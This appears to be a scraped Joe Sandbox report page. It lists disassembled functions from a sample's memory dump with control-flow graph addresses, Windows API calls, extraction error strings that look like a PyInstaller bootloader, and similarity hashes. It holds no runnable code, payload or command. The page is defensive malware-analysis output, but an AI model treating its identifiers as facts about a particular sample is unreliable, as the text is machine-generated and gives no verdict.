                                                                                                                                                                                                                        Function 00007FF729364F10 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334timeCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 245 7ff729364f10-7ff729364f4b call 7ff729364898 call 7ff7293648a0 call 7ff729364908 252 7ff729365175-7ff7293651c1 call 7ff729359c10 call 7ff729364898 call 7ff7293648a0 call 7ff729364908 245->252 253 7ff729364f51-7ff729364f5c call 7ff7293648a8 245->253 278 7ff7293651c7-7ff7293651d2 call 7ff7293648a8 252->278 279 7ff7293652ff-7ff72936536d call 7ff729359c10 call 7ff729360888 252->279 253->252 259 7ff729364f62-7ff729364f6c 253->259 261 7ff729364f8e-7ff729364f92 259->261 262 7ff729364f6e-7ff729364f71 259->262 265 7ff729364f95-7ff729364f9d 261->265 264 7ff729364f74-7ff729364f7f 262->264 267 7ff729364f8a-7ff729364f8c 264->267 268 7ff729364f81-7ff729364f88 264->268 265->265 269 7ff729364f9f-7ff729364fb2 call 7ff72935c90c 265->269 267->261 271 7ff729364fbb-7ff729364fc9 267->271 268->264 268->267 276 7ff729364fca-7ff729364fd6 call 7ff729359c58 269->276 277 7ff729364fb4-7ff729364fb6 call 7ff729359c58 269->277 286 7ff729364fdd-7ff729364fe5 276->286 277->271 278->279 288 7ff7293651d8-7ff7293651e3 call 7ff7293648d8 278->288 297 7ff72936537b-7ff72936537e 279->297 298 7ff72936536f-7ff729365376 279->298 286->286 289 7ff729364fe7-7ff729364ff8 call 7ff72935f784 286->289 288->279 299 7ff7293651e9-7ff72936520c call 7ff729359c58 GetTimeZoneInformation 288->299 289->252 300 7ff729364ffe-7ff729365054 call 7ff7293697e0 * 4 call 7ff729364e2c 289->300 301 7ff7293653b5-7ff7293653c8 call 7ff72935c90c 297->301 302 7ff729365380 297->302 304 7ff72936540b-7ff72936540e 298->304 311 7ff7293652d4-7ff7293652fe call 7ff729364890 call 7ff729364880 call 7ff729364888 299->311 312 7ff729365212-7ff729365233 299->312 357 7ff729365056-7ff72936505a 300->357 324 7ff7293653ca 301->324 325 7ff7293653d3-7ff7293653ee call 7ff729360888 301->325 306 7ff729365383 302->306 304->306 308 7ff729365414-7ff72936541c call 7ff729364f10 304->308 313 7ff729365388-7ff7293653b4 call 7ff729359c58 call 7ff72934b870 306->313 314 7ff729365383 call 7ff72936518c 306->314 308->313 318 7ff72936523e-7ff729365245 312->318 319 7ff729365235-7ff72936523b 312->319 314->313 327 7ff729365247-7ff72936524f 318->327 328 7ff729365259 318->328 319->318 332 7ff7293653cc-7ff7293653d1 call 7ff729359c58 324->332 340 7ff7293653f5-7ff729365407 call 7ff729359c58 325->340 341 7ff7293653f0-7ff7293653f3 325->341 327->328 334 7ff729365251-7ff729365257 327->334 337 7ff72936525b-7ff7293652cf call 7ff7293697e0 * 4 call 7ff729361e6c call 7ff729365424 * 2 328->337 332->302 334->337 337->311 340->304 341->332 359 7ff72936505c 357->359 360 7ff729365060-7ff729365064 357->360 359->360 360->357 362 7ff729365066-7ff72936508b call 7ff729355e68 360->362 368 7ff72936508e-7ff729365092 362->368 370 7ff729365094-7ff72936509f 368->370 371 7ff7293650a1-7ff7293650a5 368->371 370->371 373 7ff7293650a7-7ff7293650ab 370->373 371->368 376 7ff72936512c-7ff729365130 373->376 377 7ff7293650ad-7ff7293650d5 call 7ff729355e68 373->377 378 7ff729365137-7ff729365144 376->378 379 7ff729365132-7ff729365134 376->379 385 7ff7293650d7 377->385 386 7ff7293650f3-7ff7293650f7 377->386 381 7ff729365146-7ff72936515c call 7ff729364e2c 378->381 382 7ff72936515f-7ff72936516e call 7ff729364890 call 7ff729364880 378->382 379->378 381->382 382->252 389 7ff7293650da-7ff7293650e1 385->389 386->376 391 7ff7293650f9-7ff729365117 call 7ff729355e68 386->391 389->386 392 7ff7293650e3-7ff7293650f1 389->392 397 7ff729365123-7ff72936512a 391->397 392->386 392->389 397->376 398 7ff729365119-7ff72936511d 397->398 398->376 399 7ff72936511f 398->399 399->397
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF729364F55
                                                                                                                                                                                                                          • Part of subcall function 00007FF7293648A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7293648BC
                                                                                                                                                                                                                          • Part of subcall function 00007FF729359C58: RtlFreeHeap.NTDLL(?,?,?,00007FF729362032,?,?,?,00007FF72936206F,?,?,00000000,00007FF729362535,?,?,?,00007FF729362467), ref: 00007FF729359C6E
                                                                                                                                                                                                                          • Part of subcall function 00007FF729359C58: GetLastError.KERNEL32(?,?,?,00007FF729362032,?,?,?,00007FF72936206F,?,?,00000000,00007FF729362535,?,?,?,00007FF729362467), ref: 00007FF729359C78
                                                                                                                                                                                                                          • Part of subcall function 00007FF729359C10: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF729359BEF,?,?,?,?,?,00007FF729359ADA), ref: 00007FF729359C19
                                                                                                                                                                                                                          • Part of subcall function 00007FF729359C10: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF729359BEF,?,?,?,?,?,00007FF729359ADA), ref: 00007FF729359C3E
                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF729364F44
                                                                                                                                                                                                                          • Part of subcall function 00007FF729364908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72936491C
                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7293651BA
                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7293651CB
                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7293651DC
                                                                                                                                                                                                                        • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF72936541C), ref: 00007FF729365203
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1741948678.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1741917111.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1741994437.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742030379.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742030379.00007FF729383000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742100175.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                        • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                        • API String ID: 4070488512-239921721
                                                                                                                                                                                                                        • Opcode ID: 1e88bcb5f495bb70dc88d60703a9f776145871d29d9eb43ad6078281b4d73a6f
                                                                                                                                                                                                                        • Instruction ID: ad6424e5e8604dfd07304fbb049125b5f740bb4bd20f2208b6d05555d88748e1
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1e88bcb5f495bb70dc88d60703a9f776145871d29d9eb43ad6078281b4d73a6f
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E8D19E27E0824286EB24BF25DCC01B9A7B1EB45794FCA413DDA4D47687DE3CE841EB64
                                                                                                                                                                                                                        Function 00007FF729365C74 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 514 7ff729365c74-7ff729365ce7 call 7ff7293659a8 517 7ff729365ce9-7ff729365cf2 call 7ff7293543d4 514->517 518 7ff729365d01-7ff729365d0b call 7ff729357830 514->518 523 7ff729365cf5-7ff729365cfc call 7ff7293543f4 517->523 524 7ff729365d0d-7ff729365d24 call 7ff7293543d4 call 7ff7293543f4 518->524 525 7ff729365d26-7ff729365d8f CreateFileW 518->525 538 7ff729366042-7ff729366062 523->538 524->523 528 7ff729365e0c-7ff729365e17 GetFileType 525->528 529 7ff729365d91-7ff729365d97 525->529 531 7ff729365e6a-7ff729365e71 528->531 532 7ff729365e19-7ff729365e54 GetLastError call 7ff729354368 CloseHandle 528->532 534 7ff729365dd9-7ff729365e07 GetLastError call 7ff729354368 529->534 535 7ff729365d99-7ff729365d9d 529->535 541 7ff729365e79-7ff729365e7c 531->541 542 7ff729365e73-7ff729365e77 531->542 532->523 549 7ff729365e5a-7ff729365e65 call 7ff7293543f4 532->549 534->523 535->534 536 7ff729365d9f-7ff729365dd7 CreateFileW 535->536 536->528 536->534 546 7ff729365e82-7ff729365ed7 call 7ff729357748 541->546 547 7ff729365e7e 541->547 542->546 552 7ff729365ed9-7ff729365ee5 call 7ff729365bb0 546->552 553 7ff729365ef6-7ff729365f27 call 7ff729365728 546->553 547->546 549->523 552->553 559 7ff729365ee7 552->559 560 7ff729365f2d-7ff729365f6f 553->560 561 7ff729365f29-7ff729365f2b 553->561 562 7ff729365ee9-7ff729365ef1 call 7ff729359dd0 559->562 563 7ff729365f91-7ff729365f9c 560->563 564 7ff729365f71-7ff729365f75 560->564 561->562 562->538 565 7ff729366040 563->565 566 7ff729365fa2-7ff729365fa6 563->566 564->563 568 7ff729365f77-7ff729365f8c 564->568 565->538 566->565 569 7ff729365fac-7ff729365ff1 CloseHandle CreateFileW 566->569 568->563 571 7ff729365ff3-7ff729366021 GetLastError call 7ff729354368 call 7ff729357970 569->571 572 7ff729366026-7ff72936603b 569->572 571->572 572->565
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1741948678.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1741917111.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1741994437.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742030379.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742030379.00007FF729383000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742100175.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1617910340-0
                                                                                                                                                                                                                        • Opcode ID: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                                                                                                                                                                                        • Instruction ID: 28710949f67442294a4aa7b5604458390d0fb2853d6c89f23e226c0abd5a1f4e
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AFC1C237B28A4186EB10DF68C8802AC7771FB49BA8B46023DDB1E97796CF38D051DB14
                                                                                                                                                                                                                        Function 00007FF72936518C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143timeCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 845 7ff72936518c-7ff7293651c1 call 7ff729364898 call 7ff7293648a0 call 7ff729364908 852 7ff7293651c7-7ff7293651d2 call 7ff7293648a8 845->852 853 7ff7293652ff-7ff72936536d call 7ff729359c10 call 7ff729360888 845->853 852->853 858 7ff7293651d8-7ff7293651e3 call 7ff7293648d8 852->858 864 7ff72936537b-7ff72936537e 853->864 865 7ff72936536f-7ff729365376 853->865 858->853 866 7ff7293651e9-7ff72936520c call 7ff729359c58 GetTimeZoneInformation 858->866 867 7ff7293653b5-7ff7293653c8 call 7ff72935c90c 864->867 868 7ff729365380 864->868 869 7ff72936540b-7ff72936540e 865->869 875 7ff7293652d4-7ff7293652fe call 7ff729364890 call 7ff729364880 call 7ff729364888 866->875 876 7ff729365212-7ff729365233 866->876 886 7ff7293653ca 867->886 887 7ff7293653d3-7ff7293653ee call 7ff729360888 867->887 871 7ff729365383 868->871 869->871 872 7ff729365414-7ff72936541c call 7ff729364f10 869->872 877 7ff729365388-7ff7293653b4 call 7ff729359c58 call 7ff72934b870 871->877 878 7ff729365383 call 7ff72936518c 871->878 872->877 881 7ff72936523e-7ff729365245 876->881 882 7ff729365235-7ff72936523b 876->882 878->877 889 7ff729365247-7ff72936524f 881->889 890 7ff729365259 881->890 882->881 893 7ff7293653cc-7ff7293653d1 call 7ff729359c58 886->893 900 7ff7293653f5-7ff729365407 call 7ff729359c58 887->900 901 7ff7293653f0-7ff7293653f3 887->901 889->890 895 7ff729365251-7ff729365257 889->895 897 7ff72936525b-7ff7293652cf call 7ff7293697e0 * 4 call 7ff729361e6c call 7ff729365424 * 2 890->897 893->868 895->897 897->875 900->869 901->893
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7293651BA
                                                                                                                                                                                                                          • Part of subcall function 00007FF729364908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72936491C
                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7293651CB
                                                                                                                                                                                                                          • Part of subcall function 00007FF7293648A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7293648BC
                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7293651DC
                                                                                                                                                                                                                          • Part of subcall function 00007FF7293648D8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7293648EC
                                                                                                                                                                                                                          • Part of subcall function 00007FF729359C58: RtlFreeHeap.NTDLL(?,?,?,00007FF729362032,?,?,?,00007FF72936206F,?,?,00000000,00007FF729362535,?,?,?,00007FF729362467), ref: 00007FF729359C6E
                                                                                                                                                                                                                          • Part of subcall function 00007FF729359C58: GetLastError.KERNEL32(?,?,?,00007FF729362032,?,?,?,00007FF72936206F,?,?,00000000,00007FF729362535,?,?,?,00007FF729362467), ref: 00007FF729359C78
                                                                                                                                                                                                                        • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF72936541C), ref: 00007FF729365203
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1741948678.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1741917111.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1741994437.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742030379.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742030379.00007FF729383000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742100175.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                        • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                        • API String ID: 3458911817-239921721
                                                                                                                                                                                                                        • Opcode ID: c5508bc63ced89b7e96ce891f343e42cb1356f84bc391250f2f4d752248c7e40
                                                                                                                                                                                                                        • Instruction ID: 773bbca52b942a31192905a8de5c2f4e700c00e0194581e34e9b9f3e2366a3ba
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c5508bc63ced89b7e96ce891f343e42cb1356f84bc391250f2f4d752248c7e40
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 32512926A1864286E720EF21ECC11A9E771FB48784F8A513DEA4D47697DF3CE440EB64
                                                                                                                                                                                                                        Function 00007FF729341440 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 100COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1741948678.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1741917111.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1741994437.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742030379.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742030379.00007FF729383000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742100175.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Message
                                                                                                                                                                                                                        • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                        • API String ID: 2030045667-3659356012
                                                                                                                                                                                                                        • Opcode ID: 7aee35e05370beb06fa5994ffaf540438e6598347e9b72bced0967a725f5102c
                                                                                                                                                                                                                        • Instruction ID: 0c4e20bc16b3d03156a77519c31a34dbf2bbaf3cbfde96b0a1985b9b9afa970f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7aee35e05370beb06fa5994ffaf540438e6598347e9b72bced0967a725f5102c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 24419F21A08A4281EA20BF55AC801FAE3B0FF14794F8E5039DE5D57A97EE3CE541AF14
                                                                                                                                                                                                                        Function 00007FF7293411F0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 154COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1741948678.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1741917111.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1741994437.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742030379.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742030379.00007FF729383000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742100175.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Message
                                                                                                                                                                                                                        • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                        • API String ID: 2030045667-2813020118
                                                                                                                                                                                                                        • Opcode ID: 609cb8e9a3f354def7a7145314fabc2b8ac3e34908659c4ddbc906df36408c5d
                                                                                                                                                                                                                        • Instruction ID: 651fac9736e5ccbda3b60c18039e6870db851b600f91a187e4606428d49b0bdb
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 609cb8e9a3f354def7a7145314fabc2b8ac3e34908659c4ddbc906df36408c5d
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E451E322A08A4241E620BF51AC803BAA670FB55794F8D113DED4D97B97EF3CE501AF20
                                                                                                                                                                                                                        Function 00007FF72935AD6C Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 732 7ff72935ad6c-7ff72935ad92 733 7ff72935adad-7ff72935adb1 732->733 734 7ff72935ad94-7ff72935ada8 call 7ff7293543d4 call 7ff7293543f4 732->734 736 7ff72935b187-7ff72935b193 call 7ff7293543d4 call 7ff7293543f4 733->736 737 7ff72935adb7-7ff72935adbe 733->737 748 7ff72935b19e 734->748 756 7ff72935b199 call 7ff729359bf0 736->756 737->736 739 7ff72935adc4-7ff72935adf2 737->739 739->736 742 7ff72935adf8-7ff72935adff 739->742 745 7ff72935ae18-7ff72935ae1b 742->745 746 7ff72935ae01-7ff72935ae13 call 7ff7293543d4 call 7ff7293543f4 742->746 751 7ff72935b183-7ff72935b185 745->751 752 7ff72935ae21-7ff72935ae27 745->752 746->756 754 7ff72935b1a1-7ff72935b1b8 748->754 751->754 752->751 753 7ff72935ae2d-7ff72935ae30 752->753 753->746 757 7ff72935ae32-7ff72935ae57 753->757 756->748 760 7ff72935ae8a-7ff72935ae91 757->760 761 7ff72935ae59-7ff72935ae5b 757->761 765 7ff72935ae93-7ff72935aebb call 7ff72935c90c call 7ff729359c58 * 2 760->765 766 7ff72935ae66-7ff72935ae7d call 7ff7293543d4 call 7ff7293543f4 call 7ff729359bf0 760->766 763 7ff72935ae5d-7ff72935ae64 761->763 764 7ff72935ae82-7ff72935ae88 761->764 763->764 763->766 768 7ff72935af08-7ff72935af1f 764->768 793 7ff72935aebd-7ff72935aed3 call 7ff7293543f4 call 7ff7293543d4 765->793 794 7ff72935aed8-7ff72935af03 call 7ff72935b594 765->794 797 7ff72935b010 766->797 771 7ff72935af9a-7ff72935afa4 call 7ff729362c2c 768->771 772 7ff72935af21-7ff72935af29 768->772 785 7ff72935b02e 771->785 786 7ff72935afaa-7ff72935afbf 771->786 772->771 777 7ff72935af2b-7ff72935af2d 772->777 777->771 781 7ff72935af2f-7ff72935af45 777->781 781->771 782 7ff72935af47-7ff72935af53 781->782 782->771 787 7ff72935af55-7ff72935af57 782->787 789 7ff72935b033-7ff72935b053 ReadFile 785->789 786->785 791 7ff72935afc1-7ff72935afd3 GetConsoleMode 786->791 787->771 792 7ff72935af59-7ff72935af71 787->792 795 7ff72935b14d-7ff72935b156 GetLastError 789->795 796 7ff72935b059-7ff72935b061 789->796 791->785 798 7ff72935afd5-7ff72935afdd 791->798 792->771 800 7ff72935af73-7ff72935af7f 792->800 793->797 794->768 805 7ff72935b158-7ff72935b16e call 7ff7293543f4 call 7ff7293543d4 795->805 806 7ff72935b173-7ff72935b176 795->806 796->795 802 7ff72935b067 796->802 799 7ff72935b013-7ff72935b01d call 7ff729359c58 797->799 798->789 804 7ff72935afdf-7ff72935b001 ReadConsoleW 798->804 799->754 800->771 809 7ff72935af81-7ff72935af83 800->809 813 7ff72935b06e-7ff72935b083 802->813 815 7ff72935b003 GetLastError 804->815 816 7ff72935b022-7ff72935b02c 804->816 805->797 810 7ff72935b17c-7ff72935b17e 806->810 811 7ff72935b009-7ff72935b00b call 7ff729354368 806->811 809->771 819 7ff72935af85-7ff72935af95 809->819 810->799 811->797 813->799 821 7ff72935b085-7ff72935b090 813->821 815->811 816->813 819->771 825 7ff72935b0b7-7ff72935b0bf 821->825 826 7ff72935b092-7ff72935b0ab call 7ff72935a984 821->826 829 7ff72935b13b-7ff72935b148 call 7ff72935a7c4 825->829 830 7ff72935b0c1-7ff72935b0d3 825->830 834 7ff72935b0b0-7ff72935b0b2 826->834 829->834 831 7ff72935b12e-7ff72935b136 830->831 832 7ff72935b0d5 830->832 831->799 835 7ff72935b0da-7ff72935b0e1 832->835 834->799 837 7ff72935b11d-7ff72935b128 835->837 838 7ff72935b0e3-7ff72935b0e7 835->838 837->831 839 7ff72935b0e9-7ff72935b0f0 838->839 840 7ff72935b103 838->840 839->840 841 7ff72935b0f2-7ff72935b0f6 839->841 842 7ff72935b109-7ff72935b119 840->842 841->840 843 7ff72935b0f8-7ff72935b101 841->843 842->835 844 7ff72935b11b 842->844 843->842 844->831
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1741948678.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1741917111.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1741994437.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742030379.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742030379.00007FF729383000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742100175.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                        • Opcode ID: 61b7c791dd7b4870e419cd94b23561cebff66563b6152af2ba6a1b175460b8f9
                                                                                                                                                                                                                        • Instruction ID: 09fbe83cbfeb74fe244d6aa66fb7a1d160c6becd140914a9a76f05f34469e658
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 61b7c791dd7b4870e419cd94b23561cebff66563b6152af2ba6a1b175460b8f9
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 69C1F36290C68662E650AF159C842BDBF70FB9CB80F9D013DD94D43693CF7CE419AB20
                                                                                                                                                                                                                        Function 00007FF7293433E0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 59COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,00007FF729343534), ref: 00007FF729343411
                                                                                                                                                                                                                          • Part of subcall function 00007FF7293429E0: GetLastError.KERNEL32(?,?,?,00007FF72934342E,?,00007FF729343534), ref: 00007FF729342A14
                                                                                                                                                                                                                          • Part of subcall function 00007FF7293429E0: FormatMessageW.KERNEL32(?,?,?,00007FF72934342E), ref: 00007FF729342A7D
                                                                                                                                                                                                                          • Part of subcall function 00007FF7293429E0: MessageBoxW.USER32 ref: 00007FF729342ACF
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1741948678.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1741917111.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1741994437.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742030379.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742030379.00007FF729383000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742100175.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
